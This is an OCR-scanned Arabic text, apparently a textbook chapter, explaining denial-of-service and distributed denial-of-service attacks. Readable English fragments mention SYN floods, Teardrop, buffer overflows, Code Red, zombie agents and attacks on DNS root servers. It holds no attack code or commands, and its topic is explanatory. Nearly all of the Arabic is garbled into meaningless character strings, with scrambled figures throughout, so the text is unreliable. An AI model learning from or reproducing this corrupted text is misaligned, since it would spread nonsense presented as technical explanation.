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q\ jAjj .S-^J f£L& <jJa^l jll £.1 jjJaVl (j-a <£jjujj (j^al^Vl (j-a (J^ila ^-la ol^fl ^aJ LL ■ u£ all (Jaxj d Laj ^lliVl ^a 4jI 

idjjJjVI CllL^lLaJl ^UJ ^a j£j JJJ^IVI 4-JjL^jll <JLgcV1 ^ tiljV ^1 !a& 64_L13l A^ J^uudJ <JjL j ^aJJ 4^JjoJIj (j^aLkll 

IjJjui tilUfc .I^Ila^J ^aJ V 4 ^ (j£l j ttilli (j-G ^j'q^Ml CjjjS ^aJ (j-a j^ L>^ jffi £7* J*^ *O^0 ^ j J 

oAjAc f il Ala ^atiJ Igil .<LdAkll (j-a (jLa^pJ! ^a daJ a£jjuo31j ^aLkJl £-3 j-a .tilajLk-G I jjoj! 4£jjuoJI CjULoO A^jJ t^ULi ^ ^; Axj 

^ U ^il Aal .Uiajl ^ ^ aJ V ^^IaslSI tilli^j ;L_JJj3l £3 j-g <J jj^ jll tilj£ aJ V J ^ id (JS ^aA^J <jl (j^-aJ V <^ill <J J 1 ^ail 

.tik all tilLc 

tt^jaj^U ^jSl j .AjLi^Jl t^llS (jc ^Laij^al 4_laA jll CjUlkll ^alaall ^jJjj!ill Ac I jS £jJa j JJJl (j!>Lk ^ lA&La> J jl^J tiljj 

6^ cJ jL^. ^2 . j^>fi ^ jt^I ^j^> l5*^j ^ & " > " el) - * C5^^ j ^j^^ ^--^ < te5 -5c- jji*JI cl£^ *^ j ^ l$il£ ^^jll (Traffic) JJ^>*^ 

tilUA jl jAjj (jSlj (j-aLaJl 4-}La^Jl jl^?J J^l <-ajUlt Ig^l jA] ^aJ (j-aj 4£j^Jl ^ jJJ^Ji till JjojjJ ^jII j^L^aAll C5J^^ 

V ^ cill^V! ^ (Denial-Of-Service (DoS)) i> ^j.^ jl til jJcl U£ 

^ J^)^^ * u ^ ffi J 6^jJa jll li^ ^1 CllL j C flj£ ?^11q JJC. j lilsLxi till <J3 (jj^J L- fl jjoj ^^jll CjS jll (j-G ^a£ filluLO cJ^^ ^ 

?Ua^Jl (Jj^la (jC tiL <jL*aLkll ^a^l ^jljC-U clulS ^aJ (j>»J 6^ <J^aLaJl ClA^nJaJ Jl^. 4j| ^al 

aSIc) CjIa^JI j .DoS j^al^^U jl t (Denial-of -Service) Cy* <jUj^J! CjIa^a Jj^ c_jU£3I 11a 

^jjs dii^ ^Distributed Denial-of-Service (DDoS) attacks 'CjU^II ^ ^nx^ J&)!\ .1$** J^U^I 1^ 1^ 

^jlJaj (^ic l^sujjJj ^jolLq ^a AliHl A\ JJ jjU^ll 100 6 000 jffi cJ^^ cCjIjjuIslII L_ala jjj 

j id\ a-s^W fti^l ^IaxIojVI 4jqj^ Liajl ^alsu j .^j^JI aj^I I^a til^L^j DDoSj DoS C_jlji3l liA I 

AjJa jjlill djUl^^yi il^jl <c jjoij ^IxjII 4_iiL£j tl^jL^ (JjIixJI ^al*jj tt^Jj^ Aic L^jlx J^IxjIIj ;U£-<ui tilli (jj^J Ui^jc 

,^1^1 a\\ 

:(Denial of Service Attacks) ^U^aJI <> o^j^l ^Ua^ 

Asu Laic jj^.Vill Ia^jjjIj j I^jAjuj jl j ^dij^^VO ^^J'*' 1 (J^-^ £y* C_aL<L^Ji JAc AjI^J ^J^-^^ AjAslII CjA^I 

.DoS s * j> ^^ (Denial of Service Attacks) "^^Jl CjWa" 

uLjaLlll 

Asu ^jc(ciijjljVI) a£jjoJI <>^.1^<J jjj^IVI (jiblxil j <jj^ljall l^ja ^^jj l— cj! A^fcW a& jjou cJ-oxj .(DDOS Attacks ^^-^ 

lA^l ^^Jl Cjfljlt ^ A^jJ V 4jt£j 6<ifxill (j^Vl ^Ijf^ (>» ^^J^^J 6 ^ J^ 4 - tJallaJ^VI li^J IjJaj 

^ajli ^.I^aII ^jU <iaLaUJ aJJ ^LdAkll t L— iLd^A tAjjjuoll diljUill A^Jjoj jl JjuJI Cjl LlAiLa Jjuo^ (jjAj J^Jl lAA ^aJJj /'dljjljVl 
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(JiLa ^.1 jJJ ^alc (J£ju1jj .4_l3j (J jj^a jll (j-a J^l ~ lalud^ ^1 ^laJ JlllLj tiL ^aLaJI J^ JJ^>^ (J^ ^ C3^"M^ 

lal^Al t l— Lft J ^cjJaill 4_La.jxi Jj CllL a j Igil La£ tdbJa-a SjJfl ^1 Jj£l da^al l^J jS jl Vj ^\ jcl ,lLa CjLa^JI 

(Jj^aj ^Ld^Jl jxa jLaj^Jl fil ^ ^^c. Jajuj jIg jl j-aVl J 4_j^aj^a^J>Jl (illjl <uuj 4^Jjoi J^ijj .AjjL^J (jlal jC-V 6-j J 1 ^ Q/ \J 

.2004 ^ t> J ai J %679 U ^Ujj 2004 ^ t> J jVl J ^ 927 J] 



?CjLa^i) jja jbaj^Jl CjLa^A La 

J (j^aklLj jnjmj L_J jLujVI I^J-d j l(pW^ a£jjuJI j£3 j tAjj^ dbuJ c_j jLA£ (DoS) ^t*^Jl c> u^jaJI CjU^A 

4ij Jail <£l<iVl j-a j m <^l\jual\ Jc J J & >^ (JjSJ J-al jVl j diUllaJl j-a cJ^^ *^ J (J^J^k (*J^ fO^ 6 ^ U' 

Jj J jaoll Jj^»»in axj ^ (Terminal) ^jUl J ENTER JL^VI j j Jc U^l r jAu jL>Vl li* Jc ^Lku^ll j 
j^jja c al^aj jl L_j jLojVI jl J ( . ujuJI j .cJ-a*-^ el al ^ jl s j^-^-Vl j-** j^* ^ j^t ^-W^j^ j Log In ^yMI 

j& j i JjlxjaLill ^UaJ j-ajJa St^VI Jc- L_fl^xjl3 ^jjJ jj ^.^J ^jU^VI A^a* ^ ^ ^J^J JL^^VI JJ (jl djUi^kl! (j-G (jLaj^J! CjLa^A ( ■ ull > nl 
obVI L^jsull ^LaJlsLxJl 4jUr> C5 ic £3JJ-a L_llia ^jlj Jjll I^A Ls lc JaiuJaJl <L^a! ^AJj .6^lc <Jlc ^iijj J J 

^jjj .AjaLJaj 4jaJU^ CjUlJa c ^iti j^la jj6 ^JIslxJI <alla %100 ^^^>>il L^J^ ^ J ^cjjILJI jl) 

L_ALall l^ja L-j±^LiLj JJlj 'SYN-ACK jl^ 3 !^ <!^JI J t ^Uaill ^ jijj j^l) SYN ^l^kiajU j±\ 

£5^J <jL^JjojVI <>— iAaJ ^aJ lij ^JIj^jVI ^-laj] ^\ m ^ ftJJfl j 'Op-* (J j^ J ^ cJj^ * ^ (*J^J 'U^*^ IP ^J^ J^^ 

4 j£ a a jj£l jLaJjU ^ig-xJ! ^ajflJ '(J^JC-VI CjLa^A J j .<J jVl ^Uaill lA j^j^aJ ACK ^ J^ J^ UJ^ ( ♦ J t^-ftJ^Jl 

jV Jjj j 6 J j^JI J SYN-ACK ^ ^j^j L^LjaJI ^Uaill ^ jLj IP ol?^ ^l^iaiU SYN ^ c> 

.6^J^ jL^ajl fit Ala 4Jl JIj Jc <JJ^3 ClAjiklU Jj^Jl ^ 511ft! Jj l£^JJ tAjjUa^ll ACK r* J^ J^j!^ ^j^ ^ 

(j>»jJa jAA>lklaui]i CjUI > Jj (J J^^ll <JJ^1 ^J^J L^xiljjJ g A\ ~ l^loaJ Cilia tCjLd^Jl ^jUijaJl Cjl j^.1 ^ ^aJ tilll JA 



^jjjUc <LaJlx^ cjULqc. jW^^ Jj ^u^J ^ ^ 3^ fQ^fl J^j^ ^— "Teardrop ^-^Wl ^j^JI" djl a-\^\\ ^ j^.1 
JLk^j jl <LaJljL^ j*\ j\ cJLujjj j5Lk ^j-ft JjxjuHII ^Uaj J l^joiij <^JU-a3I 4\\ac* (jljc-j 4-i jIujI <A\\ \$ a 4 JlftlUj b J jj-^l jWr^^ J^ IP 

(Jjixjaul! ^Uaj qa\ >i dj^lkAxJl 4_^Jlx^ CjULqC. ^ jSJ V 'Bllffer OverflOW (v3.-- lS^^-^I ^-laj <J ^ojujJ Uui V jia J^^) ^J^ 3 
Jj (_^^JJ t-a-a (l^Lxjujj ^xlaj j dlfl jjuj jjfLLa diUi^k^ J Code Red e-tj-a^ ojijjaJl jjj JJ^ J* > J ^*1uj1 6jsu3l ^^A j) lAAj^aJ 



Malkiou^ Traffic 




Malicious traffic takes control 
over all the available bandwidth 
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Regular Traffic 
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^)JC jJ^I^)ll Jl ^LalaiVI 6L_lJj3l CjLa^a <aJ JlLd 6<C jjjuuJl <iajauVl (J^asu Jjllasu j& (DoS) 4-a-^Jl ( ; f (j^ c q ^ ^ 

(DoS) 4-a-^JI (j-« lA - *^)^ J*^ lS'^'I- .^^2kj ^iLd AjjojI^)3I (jLuJI <Jj^I jj jl t Jjj^-<JI ciLl > <JI j-^l tdijjSjV! 

jjc <jLacL ^U^ll jl t4 Ijt uoj ^Isu ;UJa^x» t^Uaauo 4_l*_^Jj t4_LoC jll L_fl^Jl JjLojj cJ^jj (j^O^ ^ 

(Jjojjj ^ig_xJl ,L_fl^Jl ^nlaJ (Jkb jl L_fl^JjaixJl jtg-^. Jc L_a*jJa3l -lataj <j!)lijjuil J <J^" ^- c 'JJ J ^ b(i 4_}1aC <J^.I,Hl3 0,1^.1 j <L Ja 
(jlaxJ cill^LujJ jll (JjLuj^)3I (J^jV l£^>^ ^^A 3 <^-^ -O^*-* c flxj^a (j>» llflJ i jll j 4 m a <L JaJ ClxjJaj AiilS JjLuij 

Jl U j 66j£li3l j (CPU time) <^J U ^31 j d£j (.(bandwidth) 4£f^l <jUaj <>ajc ^-i^ll J ^ jl 

l$j!>LaC jLja^.1 \ g j£ V t^lj's JjJ-aJl J^ J^g^ <J-gIxj13 ^LfcJ^ ^^J^ 4-^f^l J» t jl^ll 4L_fl^Jl J^nlaJ 

# (jjJC JjuJI 

4_Ai£]| Laj £JJj^ jj £xa ?l*la> 4_il Jc S JaJjuJl 4_ilc ( . ^\ * all (jli <JjLui^)3I (j* (JjI^JI ^AslSI li& Jlxi .iJ jlil t^iialU 

^Ig-xJl jtg-^. (jl (^^-^J I^Aj .L_fl^Jl ^jl j-a (jc (jl A-iLlS ^ g II (jj^J (^^J . J 1 ajVI A£jjuj (jjUaj (jia^)C. (j-d ^)Jj£3lj 

J ^ (J>»lxj3l (j£-GJj 4A£jjuo13 AjJ^j]| 4_nJl jl 4L_fl^Jl (j-d Jj£l JJJ>JI ^^)^- (j-* ^ ^ ^5^* UJ^ 

jjal J^ .JjLoj jll ^ ^jaxJI cJiL example.com ^ (DoS) u^ 1 Aa3 u^W^^ ^ ^j^^ u^^ 

tilti ^ jj ^.Ij jl^ ^ JjLoj jll ^Jjj ^.l^JI ^ jT > ^il l ^ to jjsj ^ jl^ I^jJ example.com 

.^j J example.com J! Jj^- j J f** ^ 100^000 ^ lP 3 6 u^j j'j^' 

(^a^ 4_L^j Jc (jj^Jj ^ JaJ ^cllx-d l&J^ 6 JllxJl J^f^ (J^) ^ CjUjl^l Cjli (jj^J (jl (j£-<uJl (j-d ^ J^-jl CliVI (j-« ^Jl (J^ (jVI 

(j^» (jLd^pJl 11a .1.^1^ 4_i^jJa3l (jC ^JJJ (jl Jc Sj^Ui (jj^l <*-fl ^JUJ 6^JjoJI ^I^VlmVI £A j^^l (j-d A^Jjai J£joiJ lat-d (j^3 j 

.(distributed denial-of-service (DDoS)) <^^JI 
;Vjl . l^jisu ji&l DDoS ^ o^j '^j^VI 2^1 ^ djUlAxJ I^j^j u^j^j DDoSj DoS 0* 

,<-<i^Jl (jUaj ^J^- a 1*^J (jl (j^J (jC ^aill (J- 3 *^ 'L_fl^A (_^l .IjjS L^.!>ljaj li^j .CjWI (j-« 1^. ^^JjujJ 

<j^aLaJI '"^'-^ Jc JjSix-Sl (j^J DoS ■} A 1 ^ ^ ^ CjIj^VI (j-« ^AslSI (jV 6<iaJjudJ CjVI (j>» ^^J^jj ^' 

C^Ti\ (j* cilllA .1^ Jlxi JJJ^a (3^ clA^J lg-*l'^"'V JJ^^ ^ J^VI L-llSaJJ V .5-Jj^j^3l C^jC. J <jj^alji3U 

^ 4(djUi jIslxJI d^A <9Jjia c^j) ^Vl Jc Ij^li L * a ^^ (jl^ .^I^aII l$J±\ ojj-d Jasu 

^>l ikU ja U^iisu ^jjj ^31 DDoS o^*^ <^^JI ^juJI ?(j;iijjJaJl lOO'OOO u- 0 UiUJl (jlx»j jll CjUIj^VI 

^ ^ J)*^&\\ <JIjuJJ <JjlL<i .^Ja^Jl <C jjjauJl JjLoj^)3I (j-d Jj3 (j-d Jjl ja!\ (iS^l^LujI ^aJJ jjjauJl j^JJ Jc JJ^Jl ^^>^ 

Jc ^^)3l Ajliil l-jxj gall (j^a t^^c jjuj iaLau Jl ^(^5-^ ^ j^^^ JJJ**^ a ^ aLq ^-<»!>L<i ^.jj V (jU^-VI (j-« J (ilU^a t4_jc. jJJI 

>( ^C^)jua3l iaLudill I^J \ - taJl jl (jj^ ^* g jl 

Ji5 ^J^l A^_a1I (j^ajl > ^aJI (j>>y j til^jLuoJ 

cijl^-ai j (jiajbu jll (jjjUll (j-o <c j^-^ ^ (jl j ^jojLluj tiljl cJ^^ .(W*^ cJ^^*^! t . it >^tll (j-o DDoS liUJ Jc til^cLoaj 

Jc <J jj^^JI (jj^j jjuj ^jj^ .'S^^j^ Jj^j J^jV ^SjJI ^l^jl J L_jjlaVlj ^l3A^VI (j>» ^ cJ^ t * a .^ ^* 

JLojjU tiL^Jj>» ^ala lili ^jLuoll J <JjLuj^)3I (J^asu ialLaj] ^JJ i u j (J^iij jjuj (iL (j^aLkJl ^^>JI (jj.Vu i^i J ^ajJ (JjLuj^)3I (j>» j^i^l 

l ^ ^3 D^jud^d ^1 ^IjljaJ^) (jl Ldl (j^^J S_5^*3 (j^-3 6, ^^)^l (3^^)^ (j^ < *~ J ^ C '^)^ 

dljl^ lil m lL& jll (j-d J^^JI ^cUial Jl i£^Jl 6 ^JJ C^^^ '■^O^ JJ^J '"-^ L>^ J^^^ UJ^ < — * '^^C-^f^l Jc 

4-lAlj^ll djUllik (jl 6(jiajliil3 jl <JjLoj^)3I (J^asu (jl^ aJJ > o 4^.1 j ^ajJ <j!^L^. 4'\-\\\ t ^ ^1"^ aJ Uui ^)j£l U-<ijJ lAlito jll <JjLoj^)3I 

l^Ld ^1 j CjIc jiill Jc ^ jl^i L^jjUa^ll (j-a ^1 Ai^x-d j ^£U3l <C jjoiJ (j£-oJ V iillil 6 JjjS^J dilc jilll J>LaJ jll tillS (j-d jj£I ^^Jb 

<-<i^JI (j-a (jLd^pJI ^a j^-A ^I^^U I jAl ia^a ciLi j> ,cijlc.^)ii3l ^ (jl^ail 6^1^. 4_j^ja Jc L_flii dijla 6A-i&!j£3! Jc ^ jli^i 

/ViU^l UjujU JjSj ^ ^ill tiljc ^ac Jl (jUj^ I j^IS (*n^ t^ljlr. J^JI ^JUI J (DDoS) 
;l^-Lujjj jll (JjLuj^)3I S^Uj ^UaLouj (j^j j- ^ (j^j '^>^l ^^>j <Jc ^Ijjuj (j^j cJ^ Lu^ ?tiLuiij (jc ^li^ll <J*ij (jl tilj£ liUi 

(jjjLill (j>» ^j^aII ( fljia jj . JjLoj^)1I (j>» j^^JI ^A^ill I^a J cijlc^)ii3l -ij^j -ijjj c U» tilj£3 j (jj^cL.a.ft3l (j^ ^3^^ j» 
^ "i^^j tiLi j> (jl (j^ J _cijlc^)iill (j^aalli Jl (_£^jj Uui ^a^ii (jl Ale ( . laj <j| el li^ c qK^ 4_i^3 j ?<JjLaj^)3l (j-<i l_jIaM3 

(Jjt^. jl^xi Uiajl (j^J ci^ ^ <j^LiJl jj^ aall c fljlSj (jl (j^-^ W^!^ '^^-^ (jJ^cLaixJl (j-d ^3^^ c 

<JaLaUJ ^aJ <^Jlstxi "l^^J ciL (j^aLkJl (j;iila J*l\ \ > ^>J> <J J^l djlilsLxJl ^I^JjojV tiL^j-d ^^A 3 (j^O^ 3 {j^ lS^-^I ^^>^^ ^ > H * <ft 4 ^ ^ 

djliix-<Jl (jjoij ^Ijj^J ^ jfi^ iAyftiW li^ (jc til* j>^i^ ^isu 1 a\\ ^ t^JalU .I^ajA (jj^ '(j^*-* (jjl (j* C-jjou] jll dAilx-all Ail^ <JaL^j 
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(jjAil! o$*^\ ~& * Sa { ; illaSi s-L^Jt £j-<^ L ♦ ^^^^ <JL^j*Vt cJj^-^ cl)' <-5* .<*-it,jj t^^j jl^t 

^ .lUxlt Jjoj JJ jt C_L^J ^tjJUj '^Ij (jUaJ ciLjj^k JJ^iij tit la^a J. at _1 ui li* .till JjLui L>* U^J^ 

c _ 5 ic Sj^lS jjc- j! 4jc.tj jjc. (Jj^j .iS ^^lilt -^O^ l . ^ ^ * cf-^ ^-^S 6t ^i cs^"* oj^c- .^^>^^ ( ; * cJ^ cJ^-^^ 

<JjLujj (J-g JJJ^Jt dljl£ lit .Igjlc <J jj^^Jl ^ (JjJC.jJ V (Jjill (JjjUII (JjLojj Ajjj^aJ jt 4j3tj-G j tclAjUa^Jt ^J^ j& .ti& JJ3 jJ 

Ljajl aJ ,1^. <iilJa ^jjlaLLft >JJJJ t ; u£ a <J jj^^Jt ^ tilj > ^ j3 <jl£ t4 qV^ a (jt,jL (^Jjojj-alt dllcjjjlt q^xjj) tillj* 4_i&tj£3t 

jL^jt Ig <OVimj ^^jll *^L>^ ( : ^ ^ * C-H 3 ^ ^^j] r*^ L)^ J ^ & ^ 1 11 j) ^ L — ^ ( ♦ 1 ' q * ^ cJ^-^^ ^t,^*hnt jU^-q 

^atlkt ^j^a J <LajUi ciL^l (JjfLjjai 4it ^^-istJ I^A j .AjjjII J;!!* tiL (j^aLklt (j^ *^J^ L - J W^ lW*^ '■^O^ ( ; & ^ * jl ^ jj^^JI 

<jl£ tit .(jJ*^o ,JJJJ cJ-^^ L£^J "^D^ L>^ ftiLuall CjLlA^lt lljaal] '■^O^ ^ ( . ^ (J^ L_Lil^Jj -l^)Jt 

^J^)i3t ^Ij^I ~\ ^lui\ ;<illi ^^ic .^fUU (JjuaflJ L_fl jjoj ciSjJ^jlt ti^ ^jli ^L^Jt ^lA^. ^ (J^-^ (JJjMiV^j ^jj^J^O tiLi ^ 

^alk ^j-d (ililt 4_xi^li3t 4_i&tj£3t (JjLujj (j* ^jj^ Vir-- Cjlc^iilt (J^asu ^IflJ ^jl ^^.j-<Jt £yc& tillil tUi ^ ^Jj S^^a^o jjiC. ^t j-<Jt Ij l^j] 

.A^^lt ^JjJt 

^jAxJt (jc !>Liaa toilet ojj^A^lt tillil <Ui5L<ui jl^. j> 4^. j ^^ic _4 a CjI^ jl > f >ri ti!U& ^j^3 j tUllld <jjjU£3t t j£i U»£ 
>iiJ J fijj^^l J ji^J^ .DDoS <-^^*^ c'-^' ^ '^j^V^ Sj^xII csj^Vt ^UJt ^ 

JjSj U UiUb DDoS -S £u >"V^ J ^AJJ^ 1 

^jl (j^J V iillil <£jjualt ^J^sUj ^LdUlt (Jjjoj ^jC 1 - taJl t^n^'ii t_fl jjujj .(_^^>^-Vt 6jLujVt Cjt^)juj^<» jJj tAjJjuJtj *^ ll^ It j^. ^sJ^Jj 



^Distributed Denial Of Service f j^* <-4^ 

Sj^t ^) (zombie agents) ^>j^ <^^j .(zombie agents) <^^j c^j ^ J^jj c> e^^^ ^ 

j (JjS ^j-d jLojjVt dal AL .^V^^t JJ jJJx^lt ^aUaj ^gJt (jU-ajt t . ilia jLajjlj ^ jSl! (\ £ J^l > ^ ^aJc ^JjJ ^j-d l^at jlkt ^aJ ^^jlt JJ jJJx^lt 

<jjlkxJt CjLg jlx-<Jt Jjujjj ^qj'q^ jj jjj^ti jji tl^SA j .^Luo^lt ^ V^j Aj^uJalt (Jjjia (jc Jjujjj I^ji jAjj (zombie agents) 

^t^Vt Ldt (JISj Jfl ti& .^tj dlSj jj jJix^lt oj^J>t ^j-<» ^J^xJt I^jS l_j jC. ja jjc. .JJ.JJJ 4_i^jJa <!t J^ ^aJ <it Ua Jj^^j Lq ,4_i^jJai3 

m <X* - ^alt 5Jt ^lajj t . UjujJJ jt 
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^ DDoS ^ .^H*J^ ^-^J^V^ UJ^^ M1 J ^J^^ dlLa^aJt (j* jlxJl ^AslSI .(jLudjVI ^Lg^^Ijuj (JjllaxJ (^^^ J 4 aj'N j ^-^l jC c _ 5 ^- jl 
jl ^a jJ SAaI (jjLjll (jl-^3 jl fi^l^juj ^ L_JC. JJ ^ du£ jj^JC (jl^ ^^-istJ ^ j .(JjjIUI jl AjjJaU^)3l CjLjUaII ^cjllj CjAaJ ^ -LaSS ^^-istJ 

<Jj3 (j-a dijjljVl <jjL^j3I ^JIac^U J^xi ? jl jlLVI j 6 W^I 6 *&J^^ ^ ■ J^J^ ^ <j ^ (jijuJt j j3 jla 

."U^l" JjUL (dsi fl lit DDoS 

jiull j ^2001 ^ y?* ^J^V> DDoS jjlaiJI ^ ?DDoS ^ c> la^^ uj£ u> ^ 

CjLo^JI (j-a 4'000 L>* ^ c *>*^ (.5^- clMJ^ O^j^ c ~ ^ .A£jjuo3I (jx» l^lla^.!>L<i (j£-aJ ^^1 JJJ-^I (j -0 * JJ* * *° 

^xi^L<i ^Jl (J;lx»J (jjj^ ^— jl^^)Juj (JJJ ^ ^jl^)JJ L_fll^AVI (j* 4-C ^iLa 4x« a AiJa t^Jjl ujI S^iiJ) ^* ^JjojVI 

6 j^la ^ ^3 U^^kl^l ^Jill 4lij]a3l .(dial-up connections) djVl^ilj (ISP) ^ j^-^JI ^ 

ild jjki <jla ^jI jll DDoS ^ -^^j ild chilli S .^1 jll Jal 4000 ^J^\ ^ Cixi j ^1 cjU^JI 
^ (j>i ^ '(--^j^V! (^^^>^ ^ FBI ^ 2004 j^j^ ^h^^ (*^^^ uj^ ^■^■^>^^ l>^j 6 u^*^^ 

'2001 jAj .2004 f^'j^ c_ijjaij aJUJI Sjl^kil jj£I <-G^kll o^aj . j^j^ uj^ 26 c> ^^Jl s-^ 

jjuijjfLLa ^a^l j^. (jx» ^1 C5 ic J jj^^JI (jx» (jjJC JjoJI (jj^^Jjai^ll (jx» Z98 C5^^ J^ 1 ^—^ J^JJ^^ ^5^* DDoS ^ ^ v ^*^ 

cjUij^U -u^k DNS .(DNS) JW-^ ^1 <jj1?JI 13 cjU^LJI aaIS ^ cilUA jl£ ^2002 jjj^^ 

.<K c^jjjj^U ^l^JI cjUUJI *UL)f ^^l.,n 13 ^1 j^JI o'±& j ^j^VI Cjllnkill (> j l_ijj3I 

(jl (j^J 6<J jJ^' *^J^ ^ J?^^ J-aloil lil . J^aa cJ^joiJ <--lJ^ 13 **\*\\ oi^ (jx» 9 .^—^J^V^ -^-^ L>^ (JjlaxJ ^1 <i!U& 

AijC. (j-d ^Aaajau> (jxi £fi! jll ^ l^. j-d (jl£ 6(JjjLuo£j 4(jloj ^lllxi (JjI^tM ^A^LujI (_^ill jj^AaII J^-!l .Clljjlj^U ^jAjoi L_j|^)IajJal lAaJ 
4 JjoiU^ J;iC. jl JjaiU-a cJ^^ ^ T J^> ^ \^r» J^JJ DDoS J>(S^ ^ I^qIa^LujI ^IjujJ JJ Jjj^ ^3^' '^-^ '^-^^ M ^"^J^l 

,^JI a Ak.jJ (jl ^Tjn (_^ill ^^ill jAj 



(DDOS) 4-»-^t ^.jaJk o^ljfrt 

a J^-j ^-1>->UJJ (jlal jcl ixJjl (ilLiA ,*L<»^JI t . i-v ^ ^ j-^ ^ (j* (jialjC-VI t flll^J ^3 ;L_fl^Jl jl^JI ^1 bLlLojl 

(j\ ^1 J jj^a jll 6J^3I ^a^C 

-(> 5^lc. jjc. cJ^J <lilaJ A£jJj| pbl 
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(Understanding Denial Of Service) <> cMjaJI cjU»a 10.2 



dASijill Jc diij^ jll cA a*\$\ \ fk*A jjSjII j t J£j^3I j J i afca^ j& (denial-of -service) <>»^aJI iy* cJ^ jaJI ? jaA 

jj3 jJ Jc- ^Jlajj jl tLfc JjjujI ^Ij^JjuiI ;^aUai3l ^L^jfll Jj (jjJLjuiJ 4_ljjj£]VI ^ajljaJl <J (jjllajjlxJl ^ia^I^xJI ^Jn* a m jfl jl±/&l\ S j^_^.lj 
Jc SjVhm^I j tA-J^Lall CjLg Jx-a jl (jLaJJ^I dlUjUaJ ^13 J <3jjoj (jj (j^^W^ .L^-gIa^LuAj ^gj ^-<u.hJ (jl ^irTn V J^l <La,laJl 
J _ljL^jJall & jg-a.1 Jc ^a (_£ jl^ ^ JjlistJ jl 6L_JjJI C! ll «s q > ^ AjjjoiJ t^J 4_j^Lk]| djUUJl jl ^a£J <j^aLaJl £c-gI Jill C-UJJj] S jg_^.VI 

.^ag-* ^IjJ (jlajC. J Jj <J jaJJ (jl (j^-aJ ^jl ^ l^-jl Jc- (jjlA^l^Jl <Jj3 (j* Aijl^xJl CjVI pJjVl ^aJJ 6(jLl^.VI (j* 

^a jaA Jj ^Ig-xJl (Jiljj ^aJ . J jl 6 jVl'N ^ja»Xi j& P^lc <JJ±kj| SjVhuiII j JJ Jjjrt^l 6 jg-ai (j-G J^ ^L^jSl ^DDoS J 

tlgjfijjuJ CLjIjUj jj V .(jjc jjjob<Jl (j^^jjoiAll <La,lkj| ^^sil (j>» CjI^jjoJI jl 4_i^jJa3l CjVI ^1<J ?L_atL^ L_fl^A 4_3^3 c^^ilj ^-juoij DoS 

^.^^LulU <La,JJaJl ^aJ^ (jC L_fl3jJJ A Vil > kUJ 4_i^jJa3l (jl L— Ll^ ^- j> siaW JJC. <J jj^ Jl V J tUL^jJall 6 jgai Jc ^^^jui J J^*J ^aJJ V J 

cj! J 4_i^jJa]| <j j^*JI cJ Jl *^ J ■ jjj - ^^ ^^>^ J^ f j'M^ cJ^^*^! J jxjIa <jV ^gJt-iiL 

.^aj^Jl J l ^^lmj c^illj t^l^l JjS ^i^jll ^aJj ^il jlkl <aJ ^ill (jJj^VI J J^jJa^l l ^ tilliA ^DDoS flOOd 

.^ILj^xJI I^J j jj^ll t La^jtilSI <J!>lk (j>» t<j ^- ^ ^ jjc. J jll 11a tdiVl^JI - a J 

^a * II \ A\ la Jais ^djjaij d^Ic 4_j| £^>-<J! U»^jc L^a j 1 j cLiJjudj ^ 4_i^jJa3l Jc ^Ld^Jl (j-d (jLa^aJ! ^jjjUj (jl (j^ 

^jl^JJ m 4jLA jJl Ujl;!^ (j>» \ A£ A l^3^ **— L — J ^- Xi '^ ^ £U rt\ m \ ^A^A (jj^J (jl (j^-<^ ^fwJl ^ * l^Lul^ (j-d (j^J 6 ^ aj ^ 

djU^gil ojLjaJl jUiVI Jc <Sl<iVI LpaxJ Jj Uu3 .AjjojLojVI dilxi^kJl (jiasu jj3 j!i3 j AjjL^jII JL^cVI 5-Ij^.V ClijliV! ^ 

.<Xi^kJl 

(ilti Jl J jll (jj^^jjoiAll (j^j UiAic. Jaia JUJI ( -lu^I dijjjVI Jc ^Ijl lS^^ (j - ** UJ^ *^^ L djUi^k ^Skl Jll ^1 ^^31 

ja!\ Jl ( \\ ^ q > <aj (j-d I j*^ <uj ^3 lil Aj^Iasl! ( . v&\\ ^ij ^ j£ V t . n^l ^iJ ^3 ^ tJllxJl J^f^ Jc- . t — J^^JI 

I^A j-aloil UJUa SjLuA (^x-i ^1 j-<Jl Jc L-laLa ^a .dljjljV! ^SliA Jc (jxi dil aalall ^IjJjj 

Jl <J jj^ jll (jxi I jj£ ^a] (jjill (jjbjl ?^VI Ja £3 ^<JI 4jt-djaiJ jjjJall (J^aJj jl <iija dil Jil ^a j^^l Uiajl ,^a j^(gll 

(j* cJ^J-^ J' <^^^C L_J^. J Ajjxj^ ^3 djjjjJaJ jll ^1 ^<JI .^-Ajaial La <jLacl I ji^-lj (jl ^^.J-<JI (j-d 4jjlla-<Jl ^La^iJl 

_(Jj^Lola]| J (jjj>iLai>Jl 

J^C Jc CjbljjVI AaIxj , jj^a^J] ^jU^lcl (jia^JL! (jj3 jjouJI Jj3 (jxi ^i^J diaJl j (_^^)J^3I AjjlikVI ^1 J-<JI 

CjI^jIslSI (j-a D^jjujLixi 6 jl > >A (^^-Lu ^3 ^<JI I^A (JiLa Jc <>i^Jl C .^9 j-<Jl ^ ^ 9 > (jla^JU (j^j^J (jjill (jj^ Aaajud^ll 

Jj ^jl} 4_nstjaJl (jl^ ,^1 j-<Jl Jl <J jj^ jll jj£I a1 j$ > oJ ^!>LiJL!l S^Ua J AxiVI lS^J 3 (jj^J (jl (j^-aJj '(j^ jjoixJI (jxi 

,Lljlj!>lcVI Jl 6JJujLlx» 6jLuA 

(J)NS) ^—^J^V^ LS^ 0 C — J ^^ a ^l ^^-AujI ^aliaj i JllxJl (J^f^ J^ ^J^V^ ^? a ^ ^ ^ ^ ^ ' ^^-^ J-^l lP 3 *^ 

Jj^j^jj^ J (www.example.com J^) u^V^ ^ c> J^^j s^j^^ ols^ ^ cjUJxJI j^jj 

Sjjli ^jjSj! DNS J^ c5 j^Vl cjlgn Villi (> ^jaxJI j c_jjj3I cjUq^u .(192.0.34.166 lS^) (IP) ^ JjVI 

1 ■ UjudJ 4jL^JjujVI (j^J V ^-jli 6*L<»^JI L-la^ DNS dbJa^su lil / jJla^SI (j^^JjaixJl JjS (jx» CjLd jlat-<Jl ( . lla Jc 

(jxi ^aC. Jl Jc tl^lA^jJ (j^J V ^JJjUc (jl C > UjuoJ l^Jl jj^ jll (j^-GJ V ^1 J-<JI (j-« ^JAslSI (jl <Jc ^JJjlj I^A j 6^j| Jl <J-<^J! 

t^jj^l 4f\<\\\ 4-uA\ (j* l*j^ DNS J*^ ^ J ■ JJ>*^ t° J^^-*^ ^JjVI Jc^ ^1 j^ll cilli (jl 

.(jljlk^U <jJajC Uiajl Ajj^jII 4^lA\ (jx» ^jLdAl <Jsj V jll ^lakll (jxi lA jjc-j 

